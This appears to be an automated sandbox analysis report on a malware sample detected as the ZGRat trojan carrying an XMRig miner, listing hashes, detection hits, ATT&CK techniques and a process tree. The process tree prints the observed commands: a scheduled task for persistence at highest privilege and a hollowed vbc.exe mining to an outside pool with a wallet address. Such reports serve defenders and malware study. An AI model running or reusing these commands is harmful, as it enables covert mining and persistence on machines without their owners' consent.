xmrig | 3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56

General

Target

tmp.exe
Size

5.0MB
MD5

a3fb2b623f4490ae1979fea68cfe36d6
SHA1

34bec167e0f95ecc36761f77c93c1229c2c5d1f4
SHA256

3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56
SHA512

370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912
SSDEEP

98304:xrd0tlZ+I89l7cGcGI4G/Mul2rq/aReDkizMeQUz4:x+tlQ4zGk/Mul2rVe4iwVU

Score

10^/10

Malware Config

Signatures

Detect ZGRat V1 4 IoCs

resource	yara_rule
behavioral1/memory/1632-0-0x0000000000110000-0x0000000000614000-memory.dmp	family_zgrat_v1
behavioral1/files/0x000a0000000122b8-15.dat	family_zgrat_v1
behavioral1/memory/3020-19-0x0000000000DE0000-0x00000000012E4000-memory.dmp	family_zgrat_v1
behavioral1/files/0x000a0000000122b8-47.dat	family_zgrat_v1

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 8 IoCs

miner

resource	yara_rule
behavioral1/memory/2180-32-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2180-34-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2180-35-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2180-37-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2180-36-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2180-38-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2180-39-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/2180-43-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
3020	.exe

Loads dropped DLL 2 IoCs

pid	Process
1680	cmd.exe
1680	cmd.exe

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/2180-23-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2180-24-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2180-27-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2180-28-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2180-30-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2180-32-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2180-34-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2180-35-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2180-37-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2180-36-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2180-38-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2180-39-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/2180-43-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3020 set thread context of 2180	3020	.exe	36

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2556	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2996	timeout.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
3020	.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1632	tmp.exe
Token: SeDebugPrivilege	3020	.exe
Token: SeLockMemoryPrivilege	2180	vbc.exe
Token: SeLockMemoryPrivilege	2180	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2180	vbc.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 1632 wrote to memory of 1680	1632	tmp.exe	28
PID 1632 wrote to memory of 1680	1632	tmp.exe	28
PID 1632 wrote to memory of 1680	1632	tmp.exe	28
PID 1680 wrote to memory of 2996	1680	cmd.exe	30
PID 1680 wrote to memory of 2996	1680	cmd.exe	30
PID 1680 wrote to memory of 2996	1680	cmd.exe	30
PID 1680 wrote to memory of 3020	1680	cmd.exe	31
PID 1680 wrote to memory of 3020	1680	cmd.exe	31
PID 1680 wrote to memory of 3020	1680	cmd.exe	31
PID 3020 wrote to memory of 2624	3020	.exe	32
PID 3020 wrote to memory of 2624	3020	.exe	32
PID 3020 wrote to memory of 2624	3020	.exe	32
PID 2624 wrote to memory of 2556	2624	cmd.exe	34
PID 2624 wrote to memory of 2556	2624	cmd.exe	34
PID 2624 wrote to memory of 2556	2624	cmd.exe	34
PID 3020 wrote to memory of 2180	3020	.exe	36
PID 3020 wrote to memory of 2180	3020	.exe	36
PID 3020 wrote to memory of 2180	3020	.exe	36
PID 3020 wrote to memory of 2180	3020	.exe	36
PID 3020 wrote to memory of 2180	3020	.exe	36
PID 3020 wrote to memory of 2180	3020	.exe	36
PID 3020 wrote to memory of 2180	3020	.exe	36

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1632
- C:\Windows\system32\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1DEC.tmp.bat""
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1680
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:2996
- - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
    "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3020
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2624
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:2556
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2180

C:\Windows\system32\taskeng.exe
taskeng.exe {5438764F-EE42-4117-AC69-329AEAA01316} S-1-5-21-1298544033-3225604241-2703760938-1000:IZKCKOTP\Admin:Interactive:[1]
1⤵
PID:640
- C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  2⤵
  PID:1160

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Scripting

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Scripting

1

T1064

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
3.3MB

MD5
8e312940aa7e62ae8a56bb16613d1d07

SHA1
73bf7f0b16127dfdc17d1c4874d1b65a88713b54

SHA256
3588ef38f810c654be12daace323bd44096347ac092ea2448c2d1f204c8d1e65

SHA512
9fb4b4541ffb7a1da0c2361b240b60eb5c77ad41629b392137361c83c59980d9eeb7b63808de4c7590ae5bcbc76e76862065009d82ce4ad556110d60ac4b3183

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp1DEC.tmp.bat

Filesize
168B

MD5
17f9019d5e0e548c6433b4440383b5e3

SHA1
52790dcb6638f34613cd28a555e8a4f960ff0f3c

SHA256
f3c39897f68e63b77da5f7db84da0204de490a606c97f8cc3d0151545cda451f

SHA512
fa39e4cdb3f7a882237d2a491aca0fbb0efc1890a4f050ea2890aa997d0afcd5e3bf2e0079127974472dba75eb1d5e7828b6ffa0da8fd93b4d2870597679dc59

Download Submit
\ProgramData\SystemPropertiesDataExecutionPrevention\.exe

Filesize
5.0MB

MD5
a3fb2b623f4490ae1979fea68cfe36d6

SHA1
34bec167e0f95ecc36761f77c93c1229c2c5d1f4

SHA256
3bc9c1d7f87f71c9e98fac63c2f10d2651f51848082a85d6b3550649e4289d56

SHA512
370b23364bcf8f07aa951c1c6a9d6b03b516db8fd7444d25087ad8071c54bb06fd50ce311a205e0770211167728d86516e934a39a606f0bf0c9fbdd13dca7912

Download Submit
memory/1160-48-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/1632-0-0x0000000000110000-0x0000000000614000-memory.dmp

Filesize
5.0MB

Download
memory/1632-1-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/1632-2-0x0000000002B80000-0x0000000002C00000-memory.dmp

Filesize
512KB

Download
memory/1632-3-0x0000000000640000-0x0000000000641000-memory.dmp

Filesize
4KB

Download
memory/1632-14-0x000007FEF5870000-0x000007FEF625C000-memory.dmp

Filesize
9.9MB

Download
memory/2180-38-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2180-39-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2180-23-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2180-24-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2180-25-0x000007FFFFFDA000-0x000007FFFFFDB000-memory.dmp

Filesize
4KB

Download
memory/2180-27-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2180-45-0x00000000025B0000-0x00000000025D0000-memory.dmp

Filesize
128KB

Download
memory/2180-28-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2180-30-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2180-32-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2180-33-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
memory/2180-34-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2180-35-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2180-37-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2180-36-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2180-44-0x0000000002590000-0x00000000025B0000-memory.dmp

Filesize
128KB

Download
memory/2180-22-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/2180-42-0x00000000025B0000-0x00000000025D0000-memory.dmp

Filesize
128KB

Download
memory/2180-41-0x0000000002590000-0x00000000025B0000-memory.dmp

Filesize
128KB

Download
memory/2180-43-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/3020-21-0x0000000000630000-0x0000000000631000-memory.dmp

Filesize
4KB

Download
memory/3020-29-0x000007FEF4E80000-0x000007FEF586C000-memory.dmp

Filesize
9.9MB

Download
memory/3020-20-0x000007FEF4E80000-0x000007FEF586C000-memory.dmp

Filesize
9.9MB

Download
memory/3020-19-0x0000000000DE0000-0x00000000012E4000-memory.dmp

Filesize
5.0MB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads